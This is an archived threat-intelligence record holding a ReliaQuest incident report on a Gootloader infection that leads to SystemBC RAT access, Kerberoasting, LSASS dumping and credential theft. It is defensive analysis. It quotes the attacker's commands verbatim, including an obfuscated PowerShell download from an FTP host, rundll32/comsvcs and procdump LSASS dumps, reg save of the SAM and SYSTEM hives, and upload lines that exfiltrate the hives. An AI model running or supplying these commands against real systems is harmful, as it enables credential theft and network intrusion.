{
	"id": "17a5785b-6bd4-4c2d-b72d-944433b4b792",
	"created_at": "2026-04-06T00:11:19.351631Z",
	"updated_at": "2026-04-10T13:11:50.184165Z",
	"deleted_at": null,
	"sha1_hash": "aca3488c14bf79ff6ac388dabeb468fa659c4e56",
	"title": "Goot to Loot—How a Gootloader Infection Led to Credential Access",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 399379,
	"plain_text": "Goot to Loot—How a Gootloader Infection Led to Credential Access\r\nBy Caroline Fenstermacher 22 June 2023\r\nPublished: 2023-06-22 · Archived: 2026-04-05 21:32:51 UTC\r\nHow many times have we heard “It takes just one click”? Well, in this case it took approximately three. In May 2023, the\r\nReliaQuest Threat Hunting Team responded to an incident involving credential access and exfiltration that was traced back\r\nto the JavaScript-based initial access malware “Gootloader.” Using endpoint and network telemetry, we were able to advise\r\non containment of the threat prior to impact, which was crucial since Gootloader can be leveraged as an initial access vector\r\nfor second-stage remote access tools with overall goal of deploying ransomware.\r\nIn this assessment, our team was able to identify that this particular strain of Gootloader leveraged a relatively new infection\r\nchain identified in 2022. In addition, our team identified evidence of the SystemBC RAT being leveraged as a second-stage\r\npayload to allow the attackers interactive remote access to the environment. Lastly, we discuss how the attacker leveraged\r\nthis to access and exfiltrate credentials from the environment.\r\nWhat Is Gootloader?\r\nBefore getting into the specific behavior we observed, let’s discuss Gootloader in terms of its known tactics, techniques, and\r\nprocedures (TTPs). Gootloader is a JavaScript-based initial access malware strain, meaning this is what a threat actor will\r\nuse to “initially access” the environment and enable the infiltration of remote access payloads in order to engage\r\ninteractively with its target.\r\nFor delivery, it typically depends on SEO poisoning, a technique used by attackers to manipulate the ranking of web pages\r\nin search engine results to draw clicks and prompt malware downloads. Once downloaded by the user and executed, the\r\nmalware typically establishes persistence via a scheduled task. It then begins command-and-control (C2) communication to\r\nrelay system information and infiltrate a second-stage payload that will be used to achieve post-exploitation objectives.\r\nOverall, the most common second-stage payload with Gootloader observed as a precursor is Cobalt Strike.\r\nKey Findings\r\nDelivery\r\nClick 1: During the intrusion handled by the ReliaQuest Threat Hunting Team, the initially infected user had visited an\r\ninfected site displaying the classic Gootloader forum template hosted at salamancaespectacular[.]com/what-is-the-difference-between-legal-ruled-and-wide-ruled-paper .\r\nClick 2: On this fake forum, a hyperlink prompted the user to download “the answer” to “what is the difference between\r\nlegal ruled and wide ruled paper” (Figure 1):\r\nFigure 1: Screenshot of a malicious webpage intended to host Gootloader\r\nConsidering social engineering techniques, it’s worth noting that Gootloader has recently been known to specifically target\r\nthe healthcare and legal industries. It’s easy to imagine a law student or legal firm employee innocently tapping the same\r\nquestion into Google.\r\nThe HTML of this page (Figure 2) revealed the download hosting link that the user is redirected to. This ultimately results in\r\na download of the ZIP file containing the malicious JS file onto the user’s local machine.\r\nhttps://www.reliaquest.com/blog/gootloader-infection-credential-access/\r\nPage 1 of 5\n\nFigure 2: Malicious Gootloader webpage HTML source code with download link\r\nAfter the user clicks on the file to execute it, the initial JS file executes via Windows Script Host (wscript.exe) using this\r\ncommand line:\r\n“C:\\Windows\\System32\\WScript.exe\"\"C:\\Users\\ExampleUser\\AppData\\Local\\Temp\\ Temp1_What_is_the_difference_between_legal_ruled_and_wide_ru\r\nis the difference between legal ruled and wide ruled paper 29094.js\r\nThus, the chain was started. We then observed the first Gootloader JS file dropping another JS file onto the host named\r\nlead-based paint.js within this file directory:\r\nC:\\Users\\ExampleUser\\AppData\\Roaming\\Adobe\r\nThis seemed to attempt to masquerade as a legitimate Adobe process. This file was first dropped as Conceptual\r\nDesign.log within this file directory:\r\nC:\\Users\\ExampleUser\\AppData\\Roaming\\Adobe\r\nAfter that, it was renamed to lead-based paint.js .\r\nHowever, the same Gootloader sample that we observed executing in the wild—and kicking off the incident our team\r\nresponded to—resulted in the file being placed into this directory:\r\nC:\\Users\\ExampleUser\\AppData\\Roaming\\AutoDesk\r\nThis observation was noteworthy because the initial JS payload seemed to change the directory in which it placed the second\r\nJS file per execution of the malware. This was likely a developer tactic to evade defenders who might notice patterns in the\r\nfile’s placement.\r\nAfter this point, the JS file was referred to using Windows short name: LEAD-B~1.JS , with its full filename no longer used\r\nin WScript executions. That file, with its short name, was the final Gootloader payload.\r\nPersistence\r\nThe initial JS script ( what is the difference between legal ruled and wide ruled paper 29094.js ) added the\r\nsecondary script in its shortened form as a scheduled task on the victim’s machine with the name Tribal Consultation .\r\nThe task name did not vary between executions of the Gootloader malware and was configured to run under the context of\r\nthe initiating user upon logging in.\r\nFigure 3: Scheduled task event\r\nExecution and Second-Stage Payloads\r\nThe execution of the Gootloader payload LEAD-B~1.JS via wscript.exe launched an instance of cscript.exe`, which\r\nultimately launched an obfuscated PowerShell command reaching out to 10 C2 domains, which are also listed at the end of\r\nthis assessment.\r\nhttps://www.reliaquest.com/blog/gootloader-infection-credential-access/\r\nPage 2 of 5\n\nFigure 4: LEAD-B~1.JS Command-and-Control Domains\r\nAnalysis of the commands indicated that the initial communication with these domains included information about the\r\nmachine stored in environmental variables. These environmental variables were then sent to the observed domains within\r\ncookie headers.\r\nFigure 5: LEAD-B~1.JS cookie header collection\r\nThe script indicated that information collected within these variables included the operating system, symbolic link file\r\nnames, file folder names, filenames, and running processes. This information was then Base64 encoded, and Gzip\r\ncompressed.\r\nThese domains were also used to infiltrate the second-stage payload into the machine to allow the attacker interactive remote\r\naccess. Since Gootloader is commonly known to inject the second-stage payload within the registry, we analyzed the\r\nresulting registry modifications resulting from network connections to the previously mentioned domains. We assessed this\r\npayload to likely reside within HKU\\ExampleUserSID\\SOFTWARE\\453694B5D3\\17016 and\r\nHKU\\ExampleUserSID\\SOFTWARE\\3144EAACD7\\636 .\r\nAs for identification of the second-stage payload, our team discovered, with a moderate level of confidence, that this was\r\nlikely to be SystemBC RAT. This attribution was based on observed network telemetry to the destination IP\r\n94[.]156[.]189[.]36 in reference to PowerShell executions from the registry key HKCU:\\SOFTWARE\\3144EAACD7\\$pid .\r\nAdditionally, the SHA-256 f2afd46cfef3883fc858ca7b7730d4d6ee56a7aedbdb1b1f7bda7dba054f489e associated with the file\r\nmaking these connections also strongly indicates this to be SystemBC RAT.\r\nDiscovery and Privilege Escalation\r\nAfter remote access to the initially accessed victim account was established, the attacker began discovery actions in an\r\nattempt to escalate privileges. They used that account to query Lightweight Directory Access Protocol (LDAP) information\r\nvia PowerShell, storing this information within environmental variables. This activity was evidenced by network\r\nconnections over port 389 (LDAP) and corresponding PowerShell command sourcing from the compromised user.\r\nPrivilege escalation did not occur until 58 days after the initial compromise. This could have been for many reasons—\r\nincluding an attempt at stealth, acting as an initial access broker (IAB) by handing this portion of the compromise to an\r\naffiliate (which Gootloader infections are known for), or simply a delay in operations. Our team observed the initially\r\ncompromised user querying Service Principal Names (SPNs) within the environment for service account discovery. SPNs\r\nare associated with a discoverable service and include an attached service account. Therefore, querying SPNs can allow an\r\nattacker to discover service accounts within the environment.\r\nShortly after the SPN requests, the initially compromised user requested a Kerberos ticket for a stale service account within\r\nthe environment using RC4 encryption. This activity was evidenced by Windows Security event log ID 4768 (“A Kerberos\r\nservice ticket was requested”) which indicated the encryption type to be 0x17 (RC4-HMAC). When requesting a Kerberos\r\nservice ticket using an encryption type such as RC4, the returned ticket is encrypted with the accounts NTLM password\r\nhash. As this encryption method is outdated, it can easily be cracked by attackers offline.\r\nIn addition to the service account account our team was already aware of, similar Kerberoasting activity was observed\r\nagainst several users within the environment. The resulting information was most likely collected as a list, as part of\r\nexfiltrated data to the observed C2 domains. Following this, our team did not observe interactive access to this service\r\naccount for three days.\r\nUpon interactive access to the service account, our team observed this account gathering additional information regarding\r\nthe environment in a similar fashion to the initially compromised user—by gathering information within environmental\r\nvariables and exfiltrating it to C2 domains hxxps://demo.petsure.com/xmlrpc[.]php ,\r\nhxxps://cacommerciallaw.com/xmlrpc[.]php , and hxxps://docs.vrent.techvill.net/xmlrpc[.]php .\r\nLateral Movement\r\nThe method of lateral movement used was via the Remote Desktop Protocol (RDP) sourcing from the initially compromised\r\nhost. Based on network telemetry, our team identified that the attacker used the compromised service account to RDP to\r\nthree unique hosts within the environment within minutes of each other. Of these connections, interactive actions were only\r\ntaken on one of the observed hosts: a Stealthbits Server. These mentioned RDP connections sourced from the user’s active\r\nPowerShell session on the source host.\r\nCredential Dumping and Exfiltration\r\nhttps://www.reliaquest.com/blog/gootloader-infection-credential-access/\r\nPage 3 of 5\n\nOnce remote access was established to the Stealthbits server, the attacker dumped LSASS credentials on the host. The\r\ncontents of LSASS memory can include encrypted passwords, NT hashes, LM hashes, and Kerberos tickets of active users\r\non the machine—making it a prime target for attackers. The attacker used the Minidump function of comsvcs.dll . The\r\ncomsvcs.dll is a Windows native DLL whose Minidump function enables a user to output the memory contents of a\r\nspecified process ID. By specifying the process ID of LSASS on the host, an attacker can output the contents to a dump file\r\nof their choice. In this case, the attacker did not pick an inconspicuous name for the output dump file. The file\r\nlsassdump.dmp was created via the following command:\r\n“C:\\Windows\\system32\\rundll32.exe” C:\\Windows\\System32\\comsvcs.dll MiniDump 980 C:\\lsassdump.dmp full\r\nBased on EDR telemetry, this activity appeared unsuccessful due to prevention controls. Following this, the compromised\r\nservice account was then observed infiltrating “procdump.exe”, hosted externally via FTP at:\r\nftp://eu9[.]richhost[.]eu/procdump/procdump[.]exe\r\nThis was done via a PowerShell download:\r\n[Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8;[System.Console]::InputEncoding=\r\n[Text.UTF8Encoding]: :UTF8;$key=\"E41EDE8E76\";function etc($b){$ab1=\r\n[tEXt.enCodInG]::unIcOde.gEtsTriNg([Convert]::fRoMBaSe64stRiNg($b)); try{ieX $ab1 -oUtv ou -erRoRv erw|out-null;}cAtCh{}$o1o=ouT-sTriNg -i $ou;if($erw){$o1o +=ouT-sTriNg -i $erw};\r\n[Convert]::tObAsE64stRiNg ([teXt.enCodInG]::unIcoDe.geTbyTeS($o1o))};$txn=New-Object System.Collections.ArrayList;$txn += , @(\"27467B160F\",\"$client = New-Object\r\nSystem.Net.WebClient;$client.Credentials = New-Object System.Net.NetworkCredential(\"user356\",\r\n\"7Y8nvt[RpOigl\");$client.DownloadFile (\"ftp://eu9.richhost.eu/procdump/procdump.exe\",\r\n\"C:\\procdump\");\");$txn | ForEach-Object {$txt=$_[0];$txe=etc($_[1]);\"[$key|$txt]$txe[$txt|$key]\"};\r\nProcdump is a well-known Windows Sysinternals tool that can be used to generate crash dumps of a given process.\r\nFollowing the infiltration of this tool, the attacker was observed leveraging it on the host to create a dump file of LSASS\r\nmemory:\r\nprocdump -accepteula -ma lsass.exe lsassdump\r\nFollowing dumping LSASS via procdump, the compromised user was then observed saving the registry contents of the\r\nSYSTEM hive and the SAM hive via the registry modification toolreg.exe . The SYSTEM hive includes sensitive settings\r\nand configurations associated with the local machine, including software configurations, application properties, possible\r\nuser account information, default port configurations, etc. Of particular importance is that this is the location of the\r\nSYSKEY, which may contain keys used to encrypt the SAM database. The command used by the attacker to save the\r\nSYSTEM hive can be seen below:\r\nreg save hklm\\system system\r\nThe SAM database contents include items like LSASS memory, such as usernames and their respective NTLM password\r\nhashes. The attacker may have chosen to dump both to ensure all credentials were captured. The command used to save the\r\nSAM hive can be seen below:\r\nreg save hklm\\sam\r\nThe attacker then began exfiltration of their captured data. Both hive exports were uploaded to the previously observed FTP\r\nhosting site, eu9[.]richhost[.]eu , via PowerShell:\r\n$client = New-Object System.Net.WebClient;$client.Credentials = New-Object\r\nSystem.Net.NetworkCredential(\"user356\",\r\n\"7Y8nvt[RpOigl\");$client.UploadFile(\"ftp://eu9.richhost.eu/procdump/system\", \"C:\\system\");\r\n$client = New-Object System.Net.WebClient;$client.Credentials = New-Object\r\nSystem.Net.NetworkCredential(\"user356\",\r\n\"7Y8nvt[RpOigl\");$client.UploadFile(\"ftp://eu9.richhost.eu/procdump/sam\", \"C:\\sam\");\r\nAt this point, access to compromised accounts was cut and associated hosts were isolated. No additional events associated\r\nwith the incident were noted by the ReliaQuest Threat Hunting Team.\r\nAttack Timeline\r\nhttps://www.reliaquest.com/blog/gootloader-infection-credential-access/\r\nPage 4 of 5\n\nFigure 6: Gootloader attack timeline\r\nConclusion and Recommendations\r\nAs we can see from this assessment, a simple Google search and an over-trusting mindset can lead to disastrous results for\r\nan organization. Luckily, the ReliaQuest Threat Hunting team was able to advise on containment of the threat prior to more\r\nsevere actions taking place, such as lateral movement to a domain controller and/or the deployment of ransomware.\r\nThe following are general recommendations that can help prevent the same actions in any environment.\r\nRecommendations for Prevention\r\nIoC Collection\r\n94[.]156[.]189[.]36 217[.]145[.]84[.]64 167[.]172[.]154[.]244 66[.]33[.]211[.]237 salamancaespectacular[.]com/what-is-the-difference-between-legal-ruled-and-wide-ruled-paper hxxps://emailbuilder[.]a6uat[.]co[.]uk/download[.]php hxxps://wildlife[.]org/xmlrpc[.]php hxxps://spinomenal[.]com/xmlrpc[.]php\r\nrt[.]com/xmlrpc[.]php hxxps://jocarsa[.]com/xmlrpc[.]php hxxp://ddman-vpn.ddns[.]net/wordpress/xmlrpc[.]php hxxps://gahar[.]ir/xmlrpc[.]php hxxps://anevaz[.]com[.]br/xmlrpc[.]php hxxps://pornmagazine[.]clu\r\nbased Paint[.]js what is the difference between legal ruled and wide ruled paper\r\n29094[.]js What_is_the_difference_between_legal_ruled_and_wide_ruled_paper_7301[.]zip c3a62fce18a62c8db3b43b5fa776f650fbfc91ecf66457f51\r\nSource: https://www.reliaquest.com/blog/gootloader-infection-credential-access/\r\nhttps://www.reliaquest.com/blog/gootloader-infection-credential-access/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.reliaquest.com/blog/gootloader-infection-credential-access/"
	],
	"report_names": [
		"gootloader-infection-credential-access"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434279,
	"ts_updated_at": 1775826710,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/aca3488c14bf79ff6ac388dabeb468fa659c4e56.pdf",
		"text": "https://archive.orkl.eu/aca3488c14bf79ff6ac388dabeb468fa659c4e56.txt",
		"img": "https://archive.orkl.eu/aca3488c14bf79ff6ac388dabeb468fa659c4e56.jpg"
	}
}